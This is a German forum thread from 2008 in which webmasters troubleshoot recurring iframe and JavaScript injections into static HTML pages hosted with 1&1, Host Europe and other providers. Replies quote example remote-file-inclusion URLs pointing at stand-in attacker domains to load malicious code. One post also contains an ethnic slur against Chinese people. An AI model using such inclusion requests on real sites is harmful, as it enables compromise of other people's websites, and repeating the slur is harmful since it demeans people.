|
|
|
|
|
|
Mitglied
Registrierungsdatum: Jul 2007
Beiträge: 41
|
Nach ca 5. Tagen bricht Virus aus
Hallo,
ich hab seit gut 1 monat ein Problem mit meiner Homepage.
Alle 5 Tage bricht, wenn die Homepage hochgeladen ist, ein Virus aus.
Wenn ich meine Seite lokal mit diveresen Virenscannern überprüfe wird kein Virus gefunden. Auch wenn ich die Seite neuhochlade befindet sich kein Virus auf der Seite.
Nach ca 5 Tagen jedoch wenn ich die Seite besuch schlägt der Virenscanner Alarm und ich bekomme von 1&1 eine Mail ich solle mich darum kümmern das der Virus entfernt wird. Wenn ich die Seite danach lösche und wieder neuhochlade funktioniert wieder alles ca. 5 Tage lang.
Mein FTP Passwort habe ich schon mehrmals geändert ohne Erfolg.
Welche Möglichkeiten habe ich?
Der Virus befindet sich in der index.htm
Besuch ich die Seite jedoch mit Firefox schlägt mein Virenscanner nicht an.
Gruß
|
07. 05. 2008, 19:48
|
#1
|
|
Beiträge: 1‰
Registrierungsdatum: Jun 2000
Ort: /home/vmk
Beiträge: 15.413
|
Re: Nach ca 5. Tagen bricht Virus aus
Hast du php-Skripte auf deiner Seite?
|
|
07. 05. 2008, 19:58
|
#2
|
|
Mitglied
Registrierungsdatum: Nov 2006
Beiträge: 350
|
Re: Nach ca 5. Tagen bricht Virus aus
Hast du etwa einen Trojaner auf deinen PC, der das neue Passwort immer weiterschickt?
|
|
07. 05. 2008, 20:45
|
#3
|
|
Mitglied
(Threadstarter)
Registrierungsdatum: Jul 2007
Beiträge: 41
|
Re: Nach ca 5. Tagen bricht Virus aus
php scripte nicht das ich wüsste bin nicht so der profi. hab die hp mit Front Page erstellt.
hab den pc letzte woche komplett überprüfen lassen da wurde nichts gefunden aber ich könnte von meim 2. PC aus die hp hochladen, probiere ich morgen mal
schon mal danke
|
|
07. 05. 2008, 20:56
|
#4
|
|
Der aus der Zukunft
Registrierungsdatum: Apr 2003
Beiträge: 2.829
|
Re: Nach ca 5. Tagen bricht Virus aus
ein Virus in der .htm ??
Was meldet 1&1 / dein Virenscanner denn?
Evtl. Wenn er Anschlägt die URL hier posten ohne *Beseitigung* des Virus.
Natürlich mit der Warnung vor nem Virus....
Wer damit umzugehen weis kann dann mal gucken 
|
|
07. 05. 2008, 23:24
|
#5
|
|
quassel-irc.org User
Registrierungsdatum: Sep 2004
Ort: $HOME
Beiträge: 1.281
|
Re: Nach ca 5. Tagen bricht Virus aus
Schau doch einfach mal in deine FTP-Logs ob die betroffenen Dateien nach dem du sie hochgeladen hast überschrieben wurden.
Wenn ja, ändere alle deine Passwörter (FTP, E-Mail, Konfigurationsmenü bei 1und1) von einem anderen PC.
MFG
Datafreak
|
|
08. 05. 2008, 07:30
|
#6
|
|
Bundestrojaner
Registrierungsdatum: Sep 2004
Ort: /home/trojan
Beiträge: 4.934
|
Re: Nach ca 5. Tagen bricht Virus aus
frag mal ob 1&1 die ftp-logs rausrückt und hast du zugriff auf das weblog?
|
|
08. 05. 2008, 16:38
|
#7
|
|
Der aus der Zukunft
Registrierungsdatum: Apr 2003
Beiträge: 2.829
|
Re: Nach ca 5. Tagen bricht Virus aus
Arg ... wie geschrieben würde mich erst mal interessieren was das sein soll.... ein Virus in einer html-datei kann so eigentlich nicht sein .... gibt in Bildern die Möglichkeit z.B. oder eben über scripte die eingebaut werden usw....
|
|
08. 05. 2008, 16:41
|
#8
|
|
quassel-irc.org User
Registrierungsdatum: Sep 2004
Ort: $HOME
Beiträge: 1.281
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von DrFuture
Arg ... wie geschrieben würde mich erst mal interessieren was das sein soll.... ein Virus in einer html-datei kann so eigentlich nicht sein .... gibt in Bildern die Möglichkeit z.B. oder eben über scripte die eingebaut werden usw....
|
Die mir bekanten Möglichkeiten sind iFrame und Javascript um Viren uns in Webseite einzubauen.
Meist findet man dies am Anfang oder am Ende der HTML-Datei.
Bei 1und1 hast du nen Ordner "logs" auf dem Webspace in welchem man Access-, FTP- und Mail-Logs findet.
MFG
Datafreak
|
|
08. 05. 2008, 17:41
|
#9
|
|
Mitglied
Registrierungsdatum: Mar 2008
Ort: Köln
Beiträge: 389
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von DrFuture
ein Virus in der .htm ??
Was meldet 1&1 / dein Virenscanner denn?
Evtl. Wenn er Anschlägt die URL hier posten ohne *Beseitigung* des Virus.
Natürlich mit der Warnung vor nem Virus....
Wer damit umzugehen weis kann dann mal gucken |
Das ist kein Virus in der .htm, sondern ein iframe, welches einen Trojaner nachlädt! 
Wir kämpfen hier auch gerade damit, das Ding kommt alle ca. zehn Tage wieder. Interessanterweise auch auf den Seiten, die eigentlich nur eine Weiterleitung enthalten, die über das Online-Panel des Webhosters eingestellt wird ... 
Anm.: Nein, am Webhoster liegt es definitiv nicht! Betroffen sind bei uns Host Europe, Evanzo, Goneo, 1&1, Strato und Variomedia! 
Wir waren erst auch von einem Trojaner ausgegangen - negativ! Alle aktuell verfügbaren Scanner zeigen rein gar nichts an! Das Ding muss eine Lücke in irgendeiner Webhosting-Komponenten nutzen, um die Dateien zu schreiben ... 
|
|
09. 05. 2008, 13:38
|
#10
|
|
Mitglied
Registrierungsdatum: Mar 2008
Ort: Köln
Beiträge: 389
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von DrFuture
Arg ... wie geschrieben würde mich erst mal interessieren was das sein soll.... ein Virus in einer html-datei kann so eigentlich nicht sein .... gibt in Bildern die Möglichkeit z.B. oder eben über scripte die eingebaut werden usw....
|
Wenn Du Ahnung hast, kann ich Dir den "Übeltäter" mal gerne zukommen lassen ... liegt gesichert auf meiner Festplatte. (Solange man die Seite nicht aufruft, passiert ja auch nix - ist ja "nur" ein iframe!)
|
|
09. 05. 2008, 13:40
|
#11
|
|
Beiträge: 1‰
Registrierungsdatum: Jun 2000
Ort: /home/vmk
Beiträge: 15.413
|
Re: Nach ca 5. Tagen bricht Virus aus
Logfiles durchgucken, dann weißt du doch woher das Teil kam.
Ich verstehe euer Problem nicht. So was lässt sich einfach lösen, ist aber Fleißarbeit.
edit:
@koelnmedia: Man kann seine Postings auch editieren..
|
|
09. 05. 2008, 13:40
|
#12
|
|
Mitglied
(Threadstarter)
Registrierungsdatum: Jul 2007
Beiträge: 41
|
Re: Nach ca 5. Tagen bricht Virus aus
also wenn wenn der Virus aus bricht meldet mein Virenscanner das es ein HEUR/Eploit ist.
|
|
09. 05. 2008, 14:26
|
#13
|
|
Der aus der Zukunft
Registrierungsdatum: Apr 2003
Beiträge: 2.829
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von koelnmedia
Wenn Du Ahnung hast, kann ich Dir den "Übeltäter" mal gerne zukommen lassen ... liegt gesichert auf meiner Festplatte. (Solange man die Seite nicht aufruft, passiert ja auch nix - ist ja "nur" ein iframe!)
|
Ja pack mal und schick per pn nen link zu rapidshare oder sowas....
Hm Iframe gut und recht... aber der Iframe muss ja auch irgendwie in die Seite kommen?
Sprich der Seitencode wird geändert?
Beim TS bei einer Frontpage Seite?? Sprich angeblich ohne Scripting .... irgendwie merkwürdig.
|
|
09. 05. 2008, 23:33
|
#14
|
|
Mitglied
Registrierungsdatum: Mar 2008
Ort: Köln
Beiträge: 389
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von DrFuture
Ja pack mal und schick per pn nen link zu rapidshare oder sowas....
|
Mach ich gleich ... PN kommt dann!
Zitat:
|
Zitat von DrFuture
Hm Iframe gut und recht... aber der Iframe muss ja auch irgendwie in die Seite kommen?
|
Genau das ist auch mein Problem: Wie kommt der iFrame da rein, ohne dass eigentlich ein Webspace dahinterliegt?
Wie geschrieben, habe ich bei einigen Hostern nur Domain-Umleitungen auf einen anderen Webspace eingestellt (mit der Weiterleiten-Funktion des Domain-Admin-Systems des Webhosters). Die setzen diese Umleitung dann per "Frameset" (reines HTML) um - und trotzdem kommt der Mist da rein!
Zitat:
|
Zitat von DrFuture
Sprich der Seitencode wird geändert?
|
Yepp! Wird als iFrame per codiertem JavaScript (!) infiltriert ...
Zitat:
|
Zitat von DrFuture
Beim TS bei einer Frontpage Seite?? Sprich angeblich ohne Scripting .... irgendwie merkwürdig.
|
Auch bei mir defintiv kein Scripting ... gut auf ein paar Seiten läuft schon teilweise etwas mit PHP, allerdings werden DIESE Seiten NICHT infiziert! Es trifft auch immer nur das jeweilige Root-Verzeichnis, keine Unterverzeichnisse!
Das heißt: Wenn ich auf einem Server Unterverzeichnisse anlege und diese per Domain aufrufe, werde diese Seiten NICHT infiziert. Nur die .HTML im Root-Verzeichnis des Servers enthält dann den Schadcode.
|
|
10. 05. 2008, 08:09
|
#15
|
|
quassel-irc.org User
Registrierungsdatum: Sep 2004
Ort: $HOME
Beiträge: 1.281
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von koelnmedia
Auch bei mir defintiv kein Scripting ... gut auf ein paar Seiten läuft schon teilweise etwas mit PHP, allerdings werden DIESE Seiten NICHT infiziert! Es trifft auch immer nur das jeweilige Root-Verzeichnis, keine Unterverzeichnisse
|
Sobald du eine verwundbares Script auf deinem Webspace hast, kann man alle Dateien auf deinem Webspace ändern.
Zum Beispiel mit:
- file_ get_ contents / file_ put_ contents
- fopen / fread / fputs
- system / exec / shell_ exec
Ich empfehle euch in eure FTP-Logs zu schauen.
Wenn ihr dort nur eure Uploades findet, dann wird ein Script missbraucht.
Dann sollte man in seinen Access-Logs sowas finden:
Code:
http://meineseite.de/meinscript.php?bla=http://bösewsebseite.de/lade-daten-nach.endung
Es gibt nur zwei Möglichkeiten das jemand eure Webseiten verändert!
1. Er kennt eure FTP-Zugangsdaten und ändert darüber eure Dateien.
2. Er missbraucht irgend ein Script (PHP, Perl usw).
Da aber keiner hier in seine FTP-Logs oder Access-Logs schaut, werdet ihr es nie herausfinden.
MFG
Datafreak
|
|
10. 05. 2008, 08:43
|
#16
|
|
Mitglied
Registrierungsdatum: Mar 2008
Ort: Köln
Beiträge: 389
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von Datafreak
Sobald du eine verwundbares Script auf deinem Webspace hast, kann man alle Dateien auf deinem Webspace ändern. [...]
|
Ja ja, ist ja klar ... aber WARUM wird dann eine serverseitige (!) Weiterleitung, auf die ich - bis auf die Domain, auf welche weitergeleitet wird (diese wird aber nicht verändert) - keinerlei Einfluss habe (und für die ich auch keinerlei "FTP-Zugangsdaten" habe, weil kein FTP zum Hochladen da ist) mit diesem "Ding" infiziert?
Die meisten Webspaces und Server, die infiziert werden, haben nur reine HTML-Dateien drauf ... der Server, der richtig viele PHP-Scripte laufen hat (Terminkalender etc.) wurde noch NIE infiziert!
Und wie gesagt, an den Hostern kann es auch nicht liegen! Gerade Host Europe ist für mich einer der fähigsten Hoster (nicht umsonst hosten da viele große Firmen ihre Sites, z. B. Data Becker). Trotzdem sind die auch machtlos, es gibt KEINE Einträge in den FTP-Logs für die fraglichen Zeiten ...
Na ja, seit ein paar Tagen ist ja jetzt Ruhe, hoffen wir mal, dass es so bleibt ...
|
|
10. 05. 2008, 15:28
|
#17
|
|
Beiträge: 1‰
Registrierungsdatum: Jun 2000
Ort: /home/vmk
Beiträge: 15.413
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von koelnmedia
Ja ja, ist ja klar ... aber WARUM
|
Wie soll man was genaueres sagen, wenn man keine Details kennt?
Ich wette, es hat noch niemand in die Log-Files mal reingeschaut.
Kurz gesagt: Betreibt eure Geheimniskrämerei weiter. So wird das nichts.
|
|
10. 05. 2008, 15:32
|
#18
|
|
Mitglied
Registrierungsdatum: Mar 2008
Ort: Köln
Beiträge: 389
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von vmk
Wie soll man was genaueres sagen, wenn man keine Details kennt?
Ich wette, es hat noch niemand in die Log-Files mal reingeschaut.
Kurz gesagt: Betreibt eure Geheimniskrämerei weiter. So wird das nichts.
|
Wer lesen kann, ist klar im Vorteil (Zitat aus meinem vorherigen Post):
"Trotzdem sind die auch machtlos, es gibt KEINE Einträge in den FTP-Logs für die fraglichen Zeiten ..."
Und, ganz aktuell: Nicht nur uns hat es getroffen, sondern wohl auch eine nicht allzu kleine deutsche Rundfunkanstalt ... siehe hier bei HEISE. Scheint die gleiche Attacke (JavaScript, chinesiche Websiten mit Trojaner) zu sein ...
Und jetzt? Es gibt keine weiteren Details, mehr wissen wir (wir selbst als auch unsere Hoster, namentlich HOST EUROPE, Evanzo, 1&1, Strato und Goneo) alle nicht!
Und noch einmal: Es wird REINER HTML-CODE mit einem JavaScript infiziert! Nix mit PHP, nix mit JavaScript von unserer Seite aus, nix mit ASP und sonstigem Code!
|
|
10. 05. 2008, 16:17
|
#19
|
|
Beiträge: 1‰
Registrierungsdatum: Jun 2000
Ort: /home/vmk
Beiträge: 15.413
|
Re: Nach ca 5. Tagen bricht Virus aus
Ist ja schön was du da schreibst, wieviel näher bist du einer Lösung für dein Problem damit gekommen? Wie schon gesagt, so wird das nichts und dein Problem bleibt bestehen.
btw, brüll hier nicht rum.
|
|
10. 05. 2008, 16:26
|
#20
|
|
Mitglied
Registrierungsdatum: Mar 2008
Ort: Köln
Beiträge: 389
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von Datafreak
Ich empfehle euch in eure FTP-Logs zu schauen.
Wenn ihr dort nur eure Uploades findet, dann wird ein Script missbraucht.
Dann sollte man in seinen Access-Logs sowas finden:
Code:
http://meineseite.de/meinscript.php?bla=http://bösewsebseite.de/lade-daten-nach.endung
[size="3"][color="Red"] |
So, wir haben jetzt noch einmal bei einer Website, die nicht so oft aufgerufen wird, zusammen mit dem Webhoster die Logs kontrolliert (bzw. die Jungs im RZ haben das gemacht):
Der letzte verzeichnete FTP-Zugriff erfolgte vor einem Monat (da wurde an der Seite etwas geändert). Danach Funkstille. Die Seite ist reines HTML, kein PHP, kein JavaScript, kein Perl, kein Ruby ... nichts dergleichen! Es wird quasi nur ein Bild geladen, mit dem Hinweis auf "Baustelle". Das Bild ist mit Photoshop selbst erstellt (daran kann es also auch nicht liegen). Hinter dem Bild wird zwar weiter gearbeitet (wenn es die Zeit mal wieder zulässt, aktuell aber nicht), aber die Seite dahinter ist a) reines HTML, b) in einem Unterverzeichnis und c) passwortgeschützt (per .htaccess).
Die Zugriffslogs sind "übersichtlich", daher haben wir uns für diese Seite entschieden. Seit dem letzten FTP-Zugriff wurde die fragliche Seite (/index.html) 187 mal aufgerufen. Alle Zugriffe kamen über unterschiedlich IPs, auffällig sind ca. 30 Zugriffe innerhalb von einer Stunde, die aus China (Beijing) kamen (alle anderen Zugriffe kamen aus Deutschland). Die Zugriffe aus China waren aber nach Einschätzung der Spezis im RZ nur Pings, da die fragliche Grafik nicht nachgeladen wurde!
Nachdem die Jungs im RZ wussten, wonach sie suchen mussten, haben sie es bei einer zweiten Domain auch danach gesucht - gleiches Ergebnis: Es wurde wohl nur geschaut, ob da etwas ist - geladen wurde aber nichts. Weitere (protokollierte) Zugriffe haben nicht stattgefunden!
Kann man evtl. durch eine Lücke im Apache (der läuft auf allen Webspace und Server) am Protokoll vorbeikommen? Und haben die Schlitzaugen dies vielleicht per Ping abfragen können? Fragen über Fragen ... aber keine (vernünftigen) Antworten! 
EDIT:
Zitat:
|
Zitat von Datafreak
Code:
http://meineseite.de/meinscript.php?bla=http://bösewsebseite.de/lade-daten-nach.endung
|
Diese Angriffsmöglichkeit entfällt komplett, weil a) zu 95 % kein PHP-Code genutzt wird (auf den beiden Servern, die PHP-Code und MySQL-Datenbanken enthalten, ist kein Angriff erfolgt) und b) zumindest bei Evanzo (einer der Server; der andere steht in USA) diese Funktion in allen Paketen geblockt ist:
Zitat:
|
Zitat von EVANZO
Sicherheitshinweis: PHP Includes
Das Nachladen von PHP Code aus externen Seiten per http und ftp wurde deaktiviert.
Der Aufruf der URL http://meinedomain.de/index.php?page=http://meinedomain.de/inhalt.php funktioniert nicht, aber http://meinedomain.de/index.php?page=inhalt.php funktioniert.
Diese Änderung wurde nötig, da sich leider Angreifer genau diese Lücke zu nutze machen können, um den Server und/oder Ihre Webseite zu schädigen.
z. B. so: http://meinedomain.de/index.php?page=http://angreiferdomain.de/schadcode.php
Wenn Sie aus bestimmten Gründen einen PHP Include von externem Code benötigen, schreiben Sie bitte an unseren Support.
|
Aber die Domainweiterleitungen von Evanzo waren infiziert, liegen aber nicht auf meinem Server, sondern sind eigenständige Pakete mit eigener Kundennummer etc. - es gibt keine direkte Verbindung zwischen dem Server und den Domainweiterleitungen (die Weiterleitungen gehen auf den anderen Server in den USA).
|
|
10. 05. 2008, 17:04
|
#21
|
|
Der aus der Zukunft
Registrierungsdatum: Apr 2003
Beiträge: 2.829
|
Re: Nach ca 5. Tagen bricht Virus aus
Bin noch nicht dazu gekommen mir die Seite an zu schauen.
Mein Tipp wäre fast - nachdem ich den Heise Artikel (Bzw. eher die dort Verlinkten Infos) gelesen habe Das ihr da nichts machen könnt...
Es gab mal vor laaanger Zeit einen Text einer Fachzeitschrift (Name vergessen lese mehrere ;D ) in dem Hostingpakete auf Sicherheit getestet wurden.
Leider waren auch viele große und sehr Bekannte Hoster dabei die u.a das Problem hatten das man über sehr einfache php-Scripte auf andere htdocs anderer Kunden zugreifen konnte.
Diese Einfachen Lücken wurden natürlich gleich geschlossen.
Aber es gibt sicher mehr Möglichkeiten.
Daher meine Vermutung:
Irgend ein Kunde hat auf dem Server eine unsichere Webseite ... evtl. haben die Banden sogar selber einen Webaccount? wer weis....
Damit wird Serverintern das Dokument der anderen Webs geändert.
Root-Ordner> Lässt sich leicht finden... der Aufbau ist Unternehmensweit gleich... Unterordner wären schwieriger.
Apache/ FTP-Logs wären leer da die Zugriffe nicht über ftp / webserver laufen sondern Serverintern über das Dateisystem.
Auffindbar nur über komplettes Filechange-logging am Server ... - jedenfalls fällt mir nichts einfacheres ein.
Versuch:
Gebt den Dateien die dauernt verändert werden mal auf chmod 440
mal gucken ob es dann noch immer passiert.
|
|
10. 05. 2008, 17:44
|
#22
|
|
Mitglied
Registrierungsdatum: Mar 2008
Ort: Köln
Beiträge: 389
|
Re: Nach ca 5. Tagen bricht Virus aus
Zitat:
|
Zitat von DrFuture
Daher meine Vermutung:
Irgend ein Kunde hat auf dem Server eine unsichere Webseite ... evtl. haben die Banden sogar selber einen Webaccount? wer weis....
Damit wird Serverintern das Dokument der anderen Webs geändert.
Root-Ordner> Lässt sich leicht finden... der Aufbau ist Unternehmensweit gleich... Unterordner wären schwieriger.
Apache/ FTP-Logs wären leer da die Zugriffe nicht über ftp / webserver laufen sondern Serverintern über das Dateisystem.
Auffindbar nur über komplettes Filechange-logging am Server ... - jedenfalls fällt mir nichts einfacheres ein.
|
Jetzt wo Du das sagst: Bei zwei Anbietern ist es öfter mal (beim einen so einmal die Woche, beim anderen so alle 14 Tage), dass die Webspace Probleme mit der Last haben - dann geht gar nichts mehr und die Webseiten bauen sich im "Bit pro Minute"-Tempo auf; auch eMails können dann von den fraglichen Websites nicht mehr abgerufen werden. Könnte dies damit zusammenhängen?
Zitat:
|
Zitat von DrFuture
Versuch:
Gebt den Dateien die dauernt verändert werden mal auf chmod 440
mal gucken ob es dann noch immer passiert.
|
Bei ein paar Seiten geht das nicht (ca. vier oder fünf), weil da dann doch noch ein paar HTML-Seiten dahinterstehen und unsere Software zur Erstellung der Seiten einige Probleme macht, wenn 440 eingestellt ist - bei denen, wo ich es ändern konnte, habe ich es gemacht ... nur bei den reinen Weiterleitungen ( solche Pakete z. B.) geht es nicht, weil man da keinerlei Einfluss drauf hat!
|
|
10. 05. 2008, 20:20
|
#23
|
|
Beiträge: 1‰
Registrierungsdatum: Jun 2000
Ort: /home/vmk
Beiträge: 15.413
|
Re: Nach ca 5. Tagen bricht Virus aus
DrFuture, den Artikel aus der c't kenne ich auch gut. Die Problematik betraf aber nur die Billighoster, bessere Hoster wie z.B. HE waren nicht verwundbar. Die Problematik war vereinfacht gesagt kein base_dir und für jeden Kunden lief der php-Prozeß unter der gleiche uid. Angeblich haben sich ja alle Webhoster um die Problematik gekümmert.
Ich kann mir gut vorstellen, dass der Angriff nicht unbedingt über PHP/Asp erfolgen muss. So ein Standardapache hat noch zig andere laufende Module, die vielleicht eine 0day Sicherheitslücke haben. Genau gut könnten auch ein paar Server gehackt worden sein.
Ohne das man direkten Zugriff auf alle Informationen hat, wird man da wohl wenig machen können. Es hilft sicherlich schon einiges, wenn man mal die Log-Files des eigenen Accounts sowie des gesamten Server chronologisch vergleicht und schaut wann es Änderungen an den enstprechenden Dateien gegeben hat. Irgendwo muss sich ja ein Hinweis finden lassen.
Sag mal, theblade12 - Liest du noch mit?
|
|
10. 05. 2008, 20:40
|
#24
|
|
Mitglied
Registrierungsdatum: Mar 2008
Ort: Köln
Beiträge: 389
|
Re: Nach ca 5. Tagen bricht Virus aus
| |
